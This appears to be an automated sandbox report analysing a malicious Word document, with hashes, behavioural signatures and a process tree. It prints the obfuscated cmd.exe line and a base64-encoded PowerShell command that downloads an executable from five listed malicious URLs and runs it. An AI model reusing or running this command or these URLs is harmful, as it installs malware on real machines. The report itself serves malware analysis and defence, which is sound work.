Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 15:45
Behavioral task
behavioral1
Sample
8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc
-
Size
78KB
-
MD5
8e9915043975b67b01971a4ad74fe789
-
SHA1
fb0e04b39f2ee5400e89c08f0ce8cb2bf66d97a5
-
SHA256
07afeb101eab97daac3863600d40b1851bd710d4481dbe0a93459fd07624e468
-
SHA512
85813d5d38ac484c5d915c1352d4ea015ee2df145bd028323a53c62d6f1995720e86fe3957230c734a71b84d345ea47c9dc1e68520d319d0f8a80c790988a844
-
SSDEEP
1536:VptJlmrJpmxlRw99NBE+aGW3CDp1n+xYpKY:rte2dw99fk3mbn+2pZ
Malware Config
Extracted
http://alpharockgroup.com/HT
http://adminflex.dk/l5TF6w
http://gailong.net/X5AyWfJG
http://shunji.org/logsite/TJaaB
http://binar48.ru/OtTlVIU5
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4060 1576 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 28 3204 powershell.exe 33 3204 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 4060 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1576 WINWORD.EXE 1576 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3204 powershell.exe 3204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3204 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE 1576 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 1576 wrote to memory of 4060 1576 WINWORD.EXE Cmd.exe PID 1576 wrote to memory of 4060 1576 WINWORD.EXE Cmd.exe PID 4060 wrote to memory of 3204 4060 Cmd.exe powershell.exe PID 4060 wrote to memory of 3204 4060 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8e9915043975b67b01971a4ad74fe789_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SYSTEM32\Cmd.exeCmd /V^:^oN /r "^Se^T ^ ^ ^J^e^4=^A^AC^AgA^AI^A^AC^A^gAA^IA^ACA^g^AA^IAACA^g^AA^I^A^ACA^gA^A^I^A^AC^A^gAQ^fA0^H^A^7BA^aA^M^GA0BQ^YA^M^G^A9^BwOAs^GAhBQZAI^HAiB^w^OAs^EA^u^B^wdA^QC^A^gA^Q^b^AU^G^A^0^B^Q^S^A0C^AlBwa^A8G^A2Bg^bAk^EA^7^A^Q^K^A^sEA^u^B^wdA^QCAgAA^LA^sE^AL^B^g^S^A^QCAo^AQZA^wGApBgRA^QGA^hBwbA^w^G^AuB^w^d^A^8^G^A^E^B^gLA^E^FA^UBgeAQC^A7B^Q^e^A^I^HA0^B^w^e^A^kC^Ar^BgeAg^F^Ak^A^A^IA4GA^pB^A^IA^sEALB^g^SA^QCAoA^AaAMG^A^hBQZAI^HAvBg^Z^A^s^DAnAQZAg^H^Al^Bg^LAcCArAge^AcFAZ^B^AJAsCAn^AAXAcCAr^A^w^Y^A^kGAsB^gYA^U^HA^wB^gOAYH^Au^B^Q^ZAQC^A9Aw^S^A^4^GA3^B^AJ^A^s^DAnA^gM^Ak^DA^2A^wJ^AACA9A^A^IA^oHA^X^B^QW^AQCA7AQKAcC^A^ABwJ^A^gC^A0BQa^A^wG^A^wB^w^UA4CAn^A^QN^AU^F^AJBgV^A^wG^AUB^AdA8^EAv^A^Q^dA^IHA^u^A^AO^A^Q^D^A^yBQY^A4^G^A^p^BgYA^8C^Av^Ag^OA^AH^A^0B^A^d^A^gG^A^A^B^gQ^A^EG^AhBg^SA^QFAv^A^QZ^AQH^ApB^wc^Ac^G^AvB^AbA^8C^An^B^gcA8GA^uA^QaA^oG^AuB^QdA^gGA^zB^wLA8CA^6^A^AcA^Q^H^A0^B^Aa^AA^EA^H^B^g^SAYGA^X^BQe^AE^EA^1^A^AWA8CA0^B^QZ^A^4GA^uAw^Z^A^4^GAvB^A^b^Ak^GA^h^B^wZ^A8CAvA^gO^AA^H^A^0^BAd^Ag^GAAB^w^dAYD^AG^B^AVA^UD^A^s^BwL^A^s^G^AkBgLA^g^HAl^BAb^AYG^A^u^BQ^a^A0GAk^BQ^YA^8C^Av^AgO^A^AH^A^0B^AdA^g^G^A^ABAV^Ag^E^AvA^QbA8G^AjBg^LA^A^HA^1BwbA^IHAnBwaAMGAvB^gc^A^EGAo^BAcAw^GAh^BwLA8C^A6^A^Ac^A^QH^A^0B^A^a^AcC^A^9^Awa^A^oH^A^Y^B^A^JA^s^DA^0B^gbA^U^G^Ap^BA^bA^M^E^A^iB^Q^Z^AcFA^uA^AdA^UG^A^O^BA^IA^Q^HAjB^Q^Z^Ao^G^A^iB^wb^A^0CA^3B^QZA^4GA^9AQ^UA^QF^A6B^A^J^ ^e^-^ ^l^l^e^hsr^e^wo^p& ^foR /^L %^B ^IN ( ^ 9^25^ ^ ^-^1 ^ ^0) D^O s^E^t ^OQR^J=!^OQR^J!!^J^e^4:~ %^B, 1!&& I^f %^B ^LEQ ^0 Ca^L^l %^OQR^J:^*OQRJ^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JAB6AFQAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYAHoAawA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAcABoAGEAcgBvAGMAawBnAHIAbwB1AHAALgBjAG8AbQAvAEgAVABAAGgAdAB0AHAAOgAvAC8AYQBkAG0AaQBuAGYAbABlAHgALgBkAGsALwBsADUAVABGADYAdwBAAGgAdAB0AHAAOgAvAC8AZwBhAGkAbABvAG4AZwAuAG4AZQB0AC8AWAA1AEEAeQBXAGYASgBHAEAAaAB0AHQAcAA6AC8ALwBzAGgAdQBuAGoAaQAuAG8AcgBnAC8AbABvAGcAcwBpAHQAZQAvAFQASgBhAGEAQgBAAGgAdAB0AHAAOgAvAC8AYgBpAG4AYQByADQAOAAuAHIAdQAvAE8AdABUAGwAVgBJAFUANQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQBXAHoAIAA9ACAAJwA2ADkAMgAnADsAJAB3AG4ASwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABZAFcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBLAEsAIABpAG4AIAAkAFgAegBrACkAewB0AHIAeQB7ACQAegBUAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASgBLAEsALAAgACQAdwBuAEsAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAdwBuAEsAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD59b39abbc2e5ec870d77a6b2cf5d3d308
SHA12b5c54fa12472a1887e89ae920cb269ac146ad0d
SHA2566e10528977b130b1e4e5b63c8fb2f47f3047f8a786d38fe14bc144026d920d51
SHA512c4cd51c3dd7e3f0fbb58db564c7f96845e1639794a49446db550876ac31153ae6b46dd663400984a3301fc801d35882e79c400a18b2c5c1ed6aaf2deb0ae4e4d